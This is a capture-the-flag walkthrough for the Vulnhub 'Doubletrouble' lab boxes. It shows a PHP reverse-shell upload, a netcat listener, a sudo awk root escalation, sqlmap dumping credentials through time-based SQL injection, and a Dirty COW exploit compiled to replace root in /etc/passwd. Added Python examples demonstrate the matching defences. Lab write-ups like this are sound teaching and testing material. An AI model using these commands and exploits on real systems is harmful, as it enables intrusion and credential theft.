[Vulnhub]Doubletrouble题解WP
城南花已开

Information Gathering

Service Discovery

┌──(kali㉿kali)-[~]
└─$ ip=192.168.56.103

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -A -p- $ip
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 23:34 EST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.103
Host is up (0.0018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: qdPM | Login
MAC Address: 08:00:27:AA:7B:CB (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.79 ms 192.168.56.103

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.64 seconds

An HTTP service is open, so the first attempt is a weak-password login. The username has to be an email address as well, so guessing it is unlikely to work.


Directory scanning turns up a secret directory, which contains an image.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u $ip -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.103
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/backups (Status: 301) [Size: 318] [--> http://192.168.56.103/backups/]
/batch (Status: 301) [Size: 316] [--> http://192.168.56.103/batch/]
/core (Status: 301) [Size: 315] [--> http://192.168.56.103/core/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.103/css/]
/favicon.ico (Status: 200) [Size: 894]
/images (Status: 301) [Size: 317] [--> http://192.168.56.103/images/]
/index.php (Status: 200) [Size: 5814]
/install (Status: 301) [Size: 318] [--> http://192.168.56.103/install/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.103/js/]
/robots.txt (Status: 200) [Size: 26]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.103/secret/]
/server-status (Status: 403) [Size: 279]
/sf (Status: 301) [Size: 313] [--> http://192.168.56.103/sf/]
/template (Status: 301) [Size: 319] [--> http://192.168.56.103/template/]
/uploads (Status: 301) [Size: 318] [--> http://192.168.56.103/uploads/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================


wget the image; a blind guess is that it contains steganography.

Running stegseek against the image confirms it: there is something hidden in it.

┌──(kali㉿kali)-[~]
└─$ stegseek doubletrouble.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "92camaro"
[i] Original filename: "creds.txt".
[i] Extracting to "doubletrouble.jpg.out".

cat the extracted file:

┌──(kali㉿kali)-[~]
└─$ cat doubletrouble.jpg.out
[email protected]
otis666

That gives us a user account.

Log in to the back end and look for something exploitable. There is an image upload, and it validates neither the file extension nor the MIME type, so a PHP reverse shell can be uploaded directly; one can be generated with Online - Reverse Shell Generator.
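The missing check the upload feature should have had, as an added example that is not part of the original post and not qdPM's own code. The "weak" variant goes slightly beyond the page by showing the common half-measure of trusting the client-declared Content-Type (an assumption about typical mistakes, not a description of qdPM); the hardened variant enforces a single allow-listed extension, checks the file's magic bytes against that extension, and refuses content carrying PHP open tags. All sample uploads are constructed; the PHP fragment is an inert placeholder.

```python
import os

# Allow-listed extensions mapped to the magic bytes a file of that type must start with.
ALLOWED_MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}
# PHP open tags that must never appear in an "image" served from a PHP-enabled directory.
PHP_TAGS = (b"<?php", b"<?=")

# Constructed samples: (filename, client-declared MIME type, leading bytes of the content).
SAMPLE_UPLOADS = [
    ("photo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF"),
    ("logo.png", "image/png", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"),
    ("shell.php", "image/jpeg", b"<?php /* placeholder */ ?>"),
    ("shell.jpg.php", "image/jpeg", b"\xff\xd8\xff\xe0<?php /* placeholder */ ?>"),
    ("trojan.jpg", "image/jpeg", b"\xff\xd8\xff\xe0<?php /* placeholder */ ?>"),
]


def check_upload_weak(filename, declared_mime, content):
    """Illustrative weak check: trusts only the client-supplied Content-Type header."""
    return declared_mime.startswith("image/")


def check_upload_hardened(filename, declared_mime, content):
    """Return 'ok' if the upload is acceptable, otherwise the reason it was rejected."""
    if not declared_mime.startswith("image/"):
        return "declared mime not image"
    # Normalise path separators and drop any directory component the client sent.
    base = os.path.basename(filename.replace("\\", "/")).lower()
    parts = base.split(".")
    # Exactly one extension: 'shell.jpg.php' and '.htaccess' are both refused here.
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return "multiple or missing extensions"
    ext = "." + parts[1]
    if ext not in ALLOWED_MAGIC:
        return "extension not allowed"
    # The bytes on disk must match what the extension claims, independent of the header.
    if not content.startswith(ALLOWED_MAGIC[ext]):
        return "content does not match extension"
    # A valid JPEG header with PHP appended is still executable if Apache runs PHP there.
    if any(tag in content for tag in PHP_TAGS):
        return "embedded php tag"
    return "ok"


def run_samples():
    """Evaluate every constructed sample with both checks; returns {name: (weak, hardened)}."""
    return {
        name: (check_upload_weak(name, mime, data), check_upload_hardened(name, mime, data))
        for name, mime, data in SAMPLE_UPLOADS
    }


if __name__ == "__main__":
    for name, (weak, hardened) in run_samples().items():
        print(f"{name:16} weak={'accept' if weak else 'reject':6} hardened={hardened}")
```

The weak check accepts every sample because the attacker controls the Content-Type header; the hardened check accepts only the two genuine images. Validation alone is not the whole fix: the stored file should also get a server-generated name and live in a directory where PHP execution is disabled, so that a file that slips through is served as bytes rather than run.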


Where does the uploaded file end up? Recall the uploads directory from the earlier scan; it is in there.

That gives us a web shell.

┌──(kali㉿kali)-[~]
└─$ nc -lvp 4444
listening on [any] 4444 ...
192.168.56.103: inverse host lookup failed: Unknown host
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.103] 43072
SOCKET: Shell has connected! PID: 1179
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/usr/bin/script -qc /bin/bash 2>/dev/null
www-data@doubletrouble:/var/www/html/uploads/users$

User Privilege Escalation

Checking the sudo permissions shows that awk can be used to escalate to root.

www-data@doubletrouble:/var/www$ sudo -l
Matching Defaults entries for www-data on doubletrouble:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on doubletrouble:
(ALL : ALL) NOPASSWD: /usr/bin/awk
www-data@doubletrouble:/var/www$ sudo awk 'BEGIN {system("/bin/sh")}'
# id
uid=0(root) gid=0(root) groups=0(root)
# cd root
/bin/sh: 2: cd: can't cd to root
# cd /root
# ls
doubletrouble.ova
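An audit of the misconfiguration that made this step trivial, as an added example that is not part of the original post. It parses the sudo -l output shown above (embedded verbatim as constructed sample input) and flags rules that let a user run a binary able to spawn a shell or execute arbitrary commands, with or without a password. The SHELL_CAPABLE set is an illustrative subset chosen for this example, not an exhaustive list, and the function and variable names are this example's own.

```python
import os
import re

# Constructed sample: the 'sudo -l' output the page shows for www-data, verbatim.
SUDO_L_OUTPUT = r"""Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
"""

# Binaries whose normal features include running a shell or arbitrary command
# (awk's system(), vi's :!, find -exec, interpreters, pagers). Illustrative subset.
SHELL_CAPABLE = {
    "awk", "gawk", "mawk", "nawk", "vi", "vim", "find", "perl", "python", "python2",
    "python3", "less", "more", "man", "bash", "sh", "dash", "env", "tar", "zip", "nmap",
}

# One rule line as sudo -l prints it: "(runas) TAG: TAG: /path/cmd args, /path/cmd2"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return one dict per command allowed in the 'may run the following commands' section."""
    findings = []
    in_rules = False
    for line in text.splitlines():
        # Everything before this header is Defaults noise (secure_path etc.), not rules.
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            exe = cmd.split()[0]
            name = os.path.basename(exe)
            findings.append({
                "runas": m.group("runas").strip(),
                "command": cmd,
                "nopasswd": "NOPASSWD" in tags,
                # 'ALL' grants every command, which trivially includes a shell.
                "shell_capable": exe == "ALL" or name in SHELL_CAPABLE,
            })
    return findings


def high_risk_commands(text):
    """Commands that hand the caller a root-equivalent shell; these rules need rewriting."""
    return [f["command"] for f in parse_sudo_l(text) if f["shell_capable"]]


if __name__ == "__main__":
    for f in parse_sudo_l(SUDO_L_OUTPUT):
        flag = "HIGH RISK" if f["shell_capable"] else "review"
        print(f"{flag:9} runas=({f['runas']}) nopasswd={f['nopasswd']} {f['command']}")
```

On the page's output the only rule, `(ALL : ALL) NOPASSWD: /usr/bin/awk`, is reported as high risk: awk's system() means the rule is equivalent to a passwordless root shell for www-data. The remediation is to grant the specific awk invocation the service actually needs (or move that task to a dedicated script) rather than the interpreter itself.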

The root directory holds not a flag but another virtual machine file. That is interesting: the box is nested, so solving one machine really means solving two 🤣

Check whether the box has Python and use it to start a simple HTTP server; I then fetch the file to my local machine with PowerShell's wget and import it as a second VM.

# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.1 - - [24/Nov/2024 23:10:09] "GET /doubletrouble.ova HTTP/1.1" 200 -
-----------------------------------------------------------------
⚡maple ❯❯ wget -Uri "http://192.168.56.103:8000/doubletrouble.ova" -OutFile "C:\Users\maple\Desktop\doubletrouble.ova"

The new box is named inner, which explains why privilege escalation on the first one was so easy. Scan the new box.

Information Gathering

Service Discovery

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0c (Unknown: locally administered)
192.168.56.100 08:00:27:a8:d0:48 (Unknown)
192.168.56.104 08:00:27:2a:55:9e (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.865 seconds (137.27 hosts/sec). 3 responded

┌──(kali㉿kali)-[~]
└─$ ip=192.168.56.104

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -A -p- $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 02:03 EST
Nmap scan report for www.mywaf.nyx (192.168.56.104)
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
| ssh-hostkey:
| 1024 e8:4f:84:fc:7a:20:37:8b:2b:f3:14:a9:54:9e:b7:0f (DSA)
| 2048 0c:10:50:f5:a2:d8:74:f1:94:c5:60:d7:1a:78:a4:e6 (RSA)
|_ 256 05:03:95:76:0c:7f:ac:db:b2:99:13:7e:9c:26:ca:d1 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:2A:55:9E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.15 ms www.mywaf.nyx (192.168.56.104)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.08 seconds

It also runs an HTTP service, which turns out to be a very bare login page.


Weak-password logins fail, so I suspect SQL injection. Manual injection is too tedious, so straight to sqlmap. I don't know why running it without sudo shows "unable to connect to the target URL"; a normal user should be able to reach the box, and I can curl the page fine.

Adding sudo and running it as root works. No idea why.

┌──(kali㉿kali)-[~]
└─$ sudo sqlmap -u "http://192.168.56.104/index.php" --forms --batch -D doubletrouble -T users --dump
___
__H__
___ ___[)]_____ ___ ___ {1.8.6.3#dev}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:30:24 /2024-11-25/

[02:30:24] [INFO] testing connection to the target URL
[02:30:24] [INFO] searching for forms
[1/1] Form:
POST http://192.168.56.104/index.php
POST data: uname=&psw=&btnLogin=Login
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: uname=&psw=&btnLogin=Login] (Warning: blank fields detected): uname=&psw=&btnLogin=Login
do you want to fill blank fields with random values? [Y/n] Y
[02:30:24] [INFO] resuming back-end DBMS 'mysql'
[02:30:24] [INFO] using '/root/.local/share/sqlmap/output/results-11252024_0230am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=ReGx' AND (SELECT 6801 FROM (SELECT(SLEEP(5)))KDYF) AND 'KygY'='KygY&psw=KCvn&btnLogin=Login
---
do you want to exploit this SQL injection? [Y/n] Y
[02:30:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7 (wheezy)
web application technology: PHP 5.5.38, Apache 2.2.22
back-end DBMS: MySQL >= 5.0.12
[02:30:24] [INFO] fetching columns for table 'users' in database 'doubletrouble'
[02:30:24] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[02:30:24] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[02:30:34] [INFO] retrieved:
[02:30:40] [INFO] adjusting time delay to 1 second due to good response times
username
[02:31:01] [INFO] retrieved: password
[02:31:28] [INFO] fetching entries for table 'users' in database 'doubletrouble'
[02:31:28] [INFO] fetching number of entries for table 'users' in database 'doubletrouble'
[02:31:28] [INFO] retrieved: 2
[02:31:30] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
GfsZxc1
[02:31:56] [INFO] retrieved: montreux
[02:32:25] [INFO] retrieved: ZubZub99
[02:32:57] [INFO] retrieved: clapton
Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| password | username |
+----------+----------+
| GfsZxc1 | montreux |
| ZubZub99 | clapton |
+----------+----------+

[02:33:22] [INFO] table 'doubletrouble.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.56.104/dump/doubletrouble/users.csv'
[02:33:22] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-11252024_0230am.csv'

[*] ending @ 02:33:22 /2024-11-25/
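The defect sqlmap is exercising here, shown as a vulnerable login query beside its parameterized replacement. This is an added example, not part of the original post and not the box's own PHP code; it uses Python's sqlite3 in memory with a constructed copy of the two rows sqlmap dumped, and feeds it the exact uname payload sqlmap reported. Because SLEEP() is a MySQL function, SQLite cannot execute it: the string-built query fails with "no such function: SLEEP", which is direct evidence that the attacker's text was compiled as SQL, while the parameterized query treats the same text as an ordinary username and simply finds no match.

```python
import sqlite3

# Constructed sample data mirroring the doubletrouble.users table the page dumps.
# Plaintext passwords are kept only to mirror the dump; a real app stores hashes.
SAMPLE_USERS = [("montreux", "GfsZxc1"), ("clapton", "ZubZub99")]

# The time-based blind probe sqlmap reported for the uname field, copied from the page.
SQLMAP_PROBE = "ReGx' AND (SELECT 6801 FROM (SELECT(SLEEP(5)))KDYF) AND 'KygY'='KygY"


def make_db():
    """In-memory stand-in for the MySQL database behind index.php."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, uname, psw):
    """Builds the query by string formatting: user input becomes part of the SQL text.

    Against MySQL the probe would simply delay the response by 5 seconds, which is
    what sqlmap measures; SQLite has no SLEEP(), so the injected SQL errors instead.
    """
    sql = f"SELECT username FROM users WHERE username='{uname}' AND password='{psw}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        return ("sql-error", str(exc))
    return ("ok", row[0] if row else None)


def login_safe(conn, uname, psw):
    """Parameterized query: the driver sends the input as data, never as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?", (uname, psw)
    ).fetchone()
    return ("ok", row[0] if row else None)


if __name__ == "__main__":
    db = make_db()
    print("legit, vulnerable :", login_vulnerable(db, "clapton", "ZubZub99"))
    print("legit, safe       :", login_safe(db, "clapton", "ZubZub99"))
    print("probe, vulnerable :", login_vulnerable(db, SQLMAP_PROBE, "KCvn"))
    print("probe, safe       :", login_safe(db, SQLMAP_PROBE, "KCvn"))
```

Both functions authenticate clapton correctly; only the string-built one lets the probe change the query's structure. The same probe text is also a usable detection signature: a username field carrying `SLEEP(` or a subquery alias pattern like `)KDYF)` has no legitimate reason to exist in a login request.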

That yields two accounts. I tried logging in to the web page with each and got no response at all.

The earlier scan also showed SSH open.

Try SSH instead; maybe that pays off. Luckily the second account connected straight away, haha.

┌──(kali㉿kali)-[~]
└─$ ssh clapton@$ip
[email protected]'s password:
Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
clapton@doubletrouble:~$ cat user.txt
6CEA7A737C7C651F6DA7669109B5FB52clapton@doubletrouble:~$

That gives the user flag.

Root Privilege Escalation

How to get to root? First check for SUID binaries available to the current user.

clapton@doubletrouble:~$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/exim4
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/bin/ping
/bin/mount
/bin/umount
/bin/su
/bin/ping6

Nothing useful there, so run LinPEAS.

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2016-5195] dirtycow

Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: [ debian=7|8 ],RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

One of the suggested CVEs is Dirty COW. The SSH login banner earlier showed kernel version 3.2.78-1; you can also check it with uname -a.

That matches Dirty COW's profile exactly.

LinPEAS also shows that gcc is installed on the box.

═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/bin/nc
/bin/nc.traditional
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/wget

Transfer the C source from raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c to the box and compile it.

clapton@doubletrouble:/tmp$ wget 192.168.56.102/dirty.c
--2024-11-25 02:27:04-- http://192.168.56.102/dirty.c
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4815 (4.7K) [application/octet-stream]
Saving to: `dirty.c'

100%[============================================================================================================>] 4,815 --.-K/s in 0s

2024-11-25 02:27:04 (736 MB/s) - `dirty.c' saved [4815/4815]

clapton@doubletrouble:/tmp$ ls
dirty.c linpeas.sh
clapton@doubletrouble:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
clapton@doubletrouble:/tmp$ ls
dirty dirty.c linpeas.sh
clapton@doubletrouble:/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fikF6I.XwWM36:0:0:pwned:/root:/bin/bash

mmap: 7f29f0cf9000
id
^C
clapton@doubletrouble:/tmp$ cat /etc/passwd
firefart:fikF6I.XwWM36:0:0:pwned:/root:/bin/bash
/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
clapton:x:1000:1000:,,,:/home/clapton:/bin/bash

  • gcc: the GNU Compiler Collection, used to compile the C source file.
  • -pthread: enables the POSIX threads library, which the exploit needs for its racing threads.
  • dirty.c: the C source file to compile.
  • -o dirty: names the output executable dirty.
  • -lcrypt: links the crypt library, which provides the password-hashing function used to build the new passwd entry.

This Dirty COW exploit replaces the root entry in /etc/passwd with a user named firefart whose password is the one you choose: the password prompted for when the exploit runs is firefart's password, and the account has uid 0, so it is equivalent to root.
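The trace this technique leaves is easy to audit for, which is the defender's side of the step above. The following is an added example, not part of the original post: it parses an /etc/passwd file and reports any uid-0 account that is not root, a missing root entry, a password hash stored directly in passwd rather than shadow, and malformed lines such as the "/sbin:/bin/sh" fragment the overwrite left behind. The sample inputs are constructed from the output shown on the page plus a clean baseline; function names are this example's own.

```python
# Constructed sample: the first lines of /etc/passwd as the page prints them after the
# exploit ran (the root entry overwritten, a damaged fragment left on line 2).
PASSWD_AFTER = """firefart:fikF6I.XwWM36:0:0:pwned:/root:/bin/bash
/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
clapton:x:1000:1000:,,,:/home/clapton:/bin/bash
"""

# Constructed clean baseline for the same accounts.
PASSWD_CLEAN = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
clapton:x:1000:1000:,,,:/home/clapton:/bin/bash
"""

# Password-field values that mean "look in /etc/shadow" or "locked"; anything else
# is a hash sitting in a world-readable file.
SHADOWED_OR_LOCKED = {"x", "*", "!", ""}


def audit_passwd(text):
    """Return a list of (line_number, finding, detail) tuples; empty means nothing odd."""
    findings = []
    names = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        # A valid entry has exactly seven colon-separated fields.
        if len(fields) != 7:
            findings.append((lineno, "malformed", line))
            continue
        name, pw, uid, gid, _gecos, _home, _shell = fields
        names.add(name)
        if not uid.isdigit() or not gid.isdigit():
            findings.append((lineno, "malformed", line))
            continue
        # Any second uid-0 account is root under another name.
        if int(uid) == 0 and name != "root":
            findings.append((lineno, "uid0-not-root", name))
        if pw not in SHADOWED_OR_LOCKED and not pw.startswith("!"):
            findings.append((lineno, "hash-in-passwd", name))
    # The exploit overwrote root rather than adding a line, so root itself vanishes.
    if "root" not in names:
        findings.append((0, "root-missing", ""))
    return findings


if __name__ == "__main__":
    for label, sample in (("after exploit", PASSWD_AFTER), ("clean baseline", PASSWD_CLEAN)):
        print(f"== {label}")
        for lineno, finding, detail in audit_passwd(sample) or [(0, "no findings", "")]:
            print(f"  line {lineno}: {finding} {detail}")
```

On the page's post-exploit file this reports four findings on the first two lines alone, while the clean baseline reports none; running such a check from a file-integrity monitor (or simply diffing /etc/passwd against a known-good copy, which the exploit itself conveniently leaves in /tmp/passwd.bak) catches this class of tampering immediately.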

clapton@doubletrouble:/tmp$ su -l firefart
Password:
firefart@doubletrouble:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@doubletrouble:~# cat root.txt
1B8EEA89EA92CECB931E3CC25AA8DE21firefart@doubletrouble:~#

That gives the root flag. A fairly easy box overall 😊
